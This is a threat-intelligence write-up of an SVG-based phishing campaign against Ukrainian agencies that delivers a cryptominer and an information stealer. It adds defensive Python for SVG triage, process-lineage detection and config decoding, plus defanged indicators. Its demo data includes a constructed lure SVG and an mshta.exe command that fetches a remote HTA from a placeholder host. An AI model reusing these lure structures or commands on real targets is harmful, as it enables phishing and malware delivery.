Cybercriminals are exploiting SVG files as an initial attack vector in a multi-stage campaign designed to impersonate Ukrainian government communications.
FortiGuard Labs has uncovered a sophisticated phishing campaign targeting Ukrainian government agencies through malicious Scalable Vector Graphics (SVG) files, ultimately deploying both cryptocurrency mining malware and information stealers to compromise victim systems.
The attack begins with phishing emails containing malicious SVG attachments that masquerade as official notices from the National Police of Ukraine, pressuring recipients with legal-sounding language about pending appeals and potential consequences for non-compliance.
The SVG file, named "elektronni_zapit_NPU.svg," is not a static picture: SVG is XML that a browser renders as a full document, so it can carry HTML and script just like an HTML attachment. This one contains an embedded HTML iframe element that loads a second, externally hosted SVG.

When opened in a browser, it shows a spoofed Adobe Reader page with the Ukrainian text "Please wait, your document is loading…", then automatically redirects the victim to download a password-protected archive and displays the extraction password on the same page. The password keeps mail gateways and sandboxes from inspecting the archive contents while costing the victim nothing.
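As an added illustration (not code from FortiGuard or from the campaign), the following Python script triages an SVG attachment for the constructs this lure depends on: HTML embedded through foreignObject and iframe, script, on* event handlers, and references to external hosts. The sample SVG is constructed to mirror the structure described above; lure.example.invalid is a placeholder, not an indicator from the report.

```python
"""Static triage of an SVG attachment for active-content indicators.

Added example, not FortiGuard's tooling. An SVG is XML that a browser renders as
a full document, so the same file can carry <script>, HTML inside <foreignObject>
(including <iframe>), on* event handlers and links to external hosts. This scanner
parses the file with the standard library and reports those constructs. The two
sample files below are constructed for the demo; lure.example.invalid is a
placeholder, not an indicator from the report.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Elements with no role in a static image that SVG phishing lures rely on.
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "set", "animate"}
# Attributes that can point somewhere; xlink:href is covered because namespaces are stripped.
REF_ATTRS = {"href", "src", "data"}


def _local(name):
    """Strip an XML namespace prefix: '{ns}href' -> 'href'."""
    return name.rsplit("}", 1)[-1]


def _classify_ref(value, allowed_hosts):
    """Classify a reference value; None means it is not worth reporting."""
    v = value.strip()
    low = v.lower()
    if low.startswith("javascript:"):
        return ("javascript-uri", v[:60])
    if low.startswith("data:"):
        return ("data-uri", v[:60])
    parsed = urlparse(v)
    if parsed.scheme in ("http", "https") and parsed.hostname not in allowed_hosts:
        return ("external-reference", v)
    return None


def triage_svg(svg_text, allowed_hosts=()):
    """Return a sorted list of (finding, detail) tuples; an empty list means nothing flagged."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [("unparseable", str(exc))]
    findings = []
    for el in root.iter():
        tag = _local(el.tag) if isinstance(el.tag, str) else ""
        if tag in ACTIVE_TAGS:
            findings.append(("active-element", tag))
        # An HTML meta refresh smuggled in through foreignObject is a redirect too.
        if tag == "meta" and el.attrib.get("http-equiv", "").lower() == "refresh":
            findings.append(("meta-refresh", el.attrib.get("content", "")))
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):
                findings.append(("event-handler", f"{tag}@{name}"))
            elif name in REF_ATTRS:
                hit = _classify_ref(value, allowed_hosts)
                if hit:
                    findings.append(hit)
    return sorted(findings)


def is_suspicious(svg_text, allowed_hosts=()):
    """Convenience verdict for a mail filter: anything flagged means quarantine."""
    return bool(triage_svg(svg_text, allowed_hosts))


# Constructed lure mirroring the described structure: a loading message over an
# iframe that pulls a second SVG from an external host, plus a link to the archive.
LURE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="800" height="600">
  <text x="20" y="40">Please wait, your document is loading...</text>
  <foreignObject x="0" y="60" width="800" height="540">
    <iframe xmlns="http://www.w3.org/1999/xhtml" width="800" height="540"
            src="https://lure.example.invalid/stage2.svg"></iframe>
  </foreignObject>
  <a xlink:href="https://lure.example.invalid/archive.zip"><rect width="10" height="10"/></a>
</svg>"""

# Constructed benign control: a plain vector image that must come back clean.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">
  <circle cx="8" cy="8" r="6" fill="#2a7"/>
</svg>"""

if __name__ == "__main__":
    for name, doc in (("lure", LURE_SVG), ("benign", BENIGN_SVG)):
        print(name, "->", triage_svg(doc) or "clean")
```

The allowed_hosts parameter exists so an organisation can whitelist its own CDN without turning the check off; everything else that reaches out over HTTP(S) from inside an "image" gets reported.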
The archive contains a Compiled HTML Help (CHM) file, which Windows opens with its help viewer (hh.exe), and that file starts the infection sequence proper.
Inside the CHM, the researchers found an HTML page carrying a help-viewer shortcut object; calling the object's Click method makes the viewer launch a remote HTML Application (HTA) with its window hidden, so the victim sees nothing beyond the help file.
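The hand-off from the help viewer to the HTA host is the most visible point of this chain on an endpoint. The Python below is an added example (not FortiGuard's detection content) that runs two rules over constructed Sysmon-style process-creation events: hh.exe spawning mshta.exe, and mshta.exe being handed a remote URL. It assumes the standard Windows handlers (hh.exe for CHM, mshta.exe for HTA); field names follow Sysmon Event ID 1, the events are made up for the demo, and the URL is a placeholder rather than an indicator.

```python
"""Detection logic for the CHM -> HTA hand-off described above, run over
constructed Sysmon-style process-creation events.

Added example, not FortiGuard's detection content. It assumes the standard
Windows handlers: hh.exe opens the CHM and mshta.exe runs the HTA. Field names
follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the events are
made up for the demo and the URL is a placeholder, not an indicator.
"""
import re

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Return the list of rule names a single process-creation event matches."""
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    alerts = []
    # The chain in the report: the help viewer spawns the HTA host.
    if image == "mshta.exe" and parent == "hh.exe":
        alerts.append("chm-launches-hta")
    # Remote HTA: mshta.exe handed a URL instead of a local .hta file.
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        alerts.append("mshta-remote-url")
    return alerts


def scan(events):
    """Run every event through classify_event; return [(index, alerts)] for hits only."""
    hits = []
    for i, ev in enumerate(events):
        alerts = classify_event(ev)
        if alerts:
            hits.append((i, alerts))
    return hits


# Constructed Sysmon-style events (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\analyst\Desktop\notice.chm'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": r"mshta.exe https://lure.example.invalid/count.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\analyst\notes.txt"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]

if __name__ == "__main__":
    for index, alerts in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"], "->", ", ".join(alerts))
```

The fourth sample event (a local HTA launched from Explorer) is deliberately left unflagged: the rules key on the lineage and the remote URL the report describes, not on mshta.exe in general, which keeps the noise down on estates that still run legitimate HTAs.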

The HTA is the loader the researchers track as CountLoader, obfuscated with string encoding and array shuffling.
Once running, it contacts its servers, collects basic information about the victim system and sends it in HTTP POST requests encoded with an XOR-and-Base64 scheme the researchers call XorBase64, which hides the fields from casual inspection but not from an analyst who has recovered the key.
The loader supports six commands covering file download, archive extraction, DLL execution, domain reconnaissance, and clean-up of its own traces.
Dual Payload Deployment
PureMiner Cryptominer
The campaign deploys PureMiner, a stealthy .NET cryptominer delivered through the ergosystem.zip archive.
It relies on DLL sideloading and on .NET Ahead-of-Time (AOT) compilation, which ships native code rather than IL and so sidesteps the usual .NET decompilers. The mining payload is stored encrypted in the binary's .rdata section; at run time it is decrypted and injected into a legitimate .NET Framework process by process hollowing, so the miner runs under a trusted process name.

PureMiner conducts extensive hardware reconnaissance, utilizing APIs from AMD Display Library and NVIDIA libraries to collect video adapter specifications, memory details, and usage statistics.
The miner checks for at least 4 GB of RAM before deploying and, depending on its configuration, installs either a CPU-based or a GPU-based mining module.

It keeps a persistent command-and-control channel protected with 3DES and can execute downloaded payloads, remove its own persistence, watch for analysis tools, check the foreground window, and detect when the system is idle.
Amatera Stealer Information Harvester
In parallel, the smtpB.zip archive delivers Amatera Stealer through a Python-based loader that uses the open-source PythonMemoryModule project to load the stealer from memory without writing it to disk.

The stealer creates a hardcoded mutex so that only one instance runs, then fetches from its servers a configuration file that is RC4-encrypted and Base64-encoded; that configuration decides what gets harvested.
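The two encodings named in this write-up, CountLoader's XorBase64 beacon data and Amatera's Base64-wrapped RC4 configuration, are both trivial to undo once the key is known. The following Python is added here and is not taken from the report or from either malware family: it implements both decoders plus a small single-byte XOR key recovery for a captured POST body. It assumes XorBase64 means XOR with a repeating key followed by Base64 (the article gives neither the key nor the order of operations); the keys and sample data are constructed for the demo.

```python
"""Decoders for the two wire encodings named in this write-up: CountLoader's
"XorBase64" beacon data and Amatera's Base64-wrapped, RC4-encrypted config.

Added example, not code from the FortiGuard report or from either malware family.
Assumptions: "XorBase64" is taken to mean XOR with a repeating key followed by
Base64 (the article gives neither the key nor the order of operations); the RC4
key and the sample config below are constructed for the demo.
"""
import base64
import json
import string

PRINTABLE = set(string.printable.encode())


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the operation is its own inverse."""
    if not key:
        raise ValueError("empty XOR key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_b64_encode(plain: bytes, key: bytes) -> str:
    """What a loader would POST: XOR, then Base64 (assumed order)."""
    return base64.b64encode(xor_bytes(plain, key)).decode("ascii")


def xor_b64_decode(text: str, key: bytes) -> bytes:
    """Analyst side: strip the Base64, then undo the XOR."""
    return xor_bytes(base64.b64decode(text), key)


def recover_single_byte_xor_key(text: str, crib: bytes):
    """Brute-force a one-byte XOR key from a captured Base64 body, keeping only keys
    whose output starts with the expected plaintext (crib) and is fully printable.
    Only single-byte keys are tried; longer keys need a longer crib and more work."""
    raw = base64.b64decode(text)
    hits = []
    for k in range(256):
        out = xor_bytes(raw, bytes([k]))
        if out.startswith(crib) and all(b in PRINTABLE for b in out):
            hits.append(k)
    return hits


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), written out so there is no dependency beyond stdlib.
    Encryption and decryption are the same call."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decode_rc4_b64_config(blob: str, key: bytes) -> dict:
    """Base64-decode, RC4-decrypt, and parse the config as JSON."""
    return json.loads(rc4(key, base64.b64decode(blob)).decode("utf-8"))


# Constructed sample data for the demo (not real traffic or keys from the campaign).
BEACON_KEY = b"\x5a"
BEACON_PLAINTEXT = b'{"host":"WS-01","user":"analyst","os":"Windows 10"}'
BEACON_BODY = xor_b64_encode(BEACON_PLAINTEXT, BEACON_KEY)

CONFIG_KEY = b"demo-config-key"
CONFIG_PLAINTEXT = {"c2": "lure.example.invalid", "targets": ["browsers", "wallets"]}
CONFIG_BLOB = base64.b64encode(rc4(CONFIG_KEY, json.dumps(CONFIG_PLAINTEXT).encode())).decode()

if __name__ == "__main__":
    print(xor_b64_decode(BEACON_BODY, BEACON_KEY))
    print("candidate XOR keys:", recover_single_byte_xor_key(BEACON_BODY, b'{"'))
    print(decode_rc4_b64_config(CONFIG_BLOB, CONFIG_KEY))
```

The key-recovery routine works because beacon bodies almost always start with a predictable byte or two (a JSON brace, a field name, a host name), and a single-byte XOR leaks the key from that first byte alone; if a sample decodes to several printable candidates, lengthen the crib.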
Amatera Stealer systematically targets multiple data categories including system information (computer names, usernames, operating systems, hardware specifications), browser data from both Gecko-based and Chromium-based applications, cryptocurrency wallet extensions, desktop applications like Steam and Telegram, and cryptocurrency desktop wallets.
To get at current browser data it uses both legacy cookie decryption and a bypass of Chromium's App-Bound Encryption (ABE), calling the browser's own COM decryption interface and injecting into the browser process.
Impact and Implications
This campaign shows how phishing tactics have evolved: because browsers treat an SVG as a document rather than a picture, an SVG attachment can do everything an HTML attachment does while slipping past filters that only look for HTML, scripts and executables.
The combination of resource hijacking through cryptocurrency mining and comprehensive data theft creates dual revenue streams for attackers.
The targeting of Ukrainian government entities during ongoing geopolitical tensions highlights the campaign’s potential state-sponsored or politically motivated nature.
Organizations should run security awareness training that covers this lure, configure mail filtering to treat SVG attachments as active content (block them, or at least detonate and inspect them rather than passing them through as images), and deploy endpoint detection able to catch fileless execution. Two cheap checks follow directly from this chain: alert on hh.exe spawning mshta.exe, and restrict mshta.exe on workstations that have no business running HTAs.
The abuse of legitimate Windows features such as CHM files and HTA applications, combined with the evasion techniques described above, is why defences need several layers that can break the chain before data and compute are lost.
IOCs
Domains / IPs:
npulvivgov[.]cfd
ms-team-ping{1 to 10}[.]com
azure-expresscontainer{1 to 10}[.]com
acqua-tecnica[.]it
phuyufact[.]com
109[.]176[.]207[.]110
amaprox[.]click
ama0899[.]shop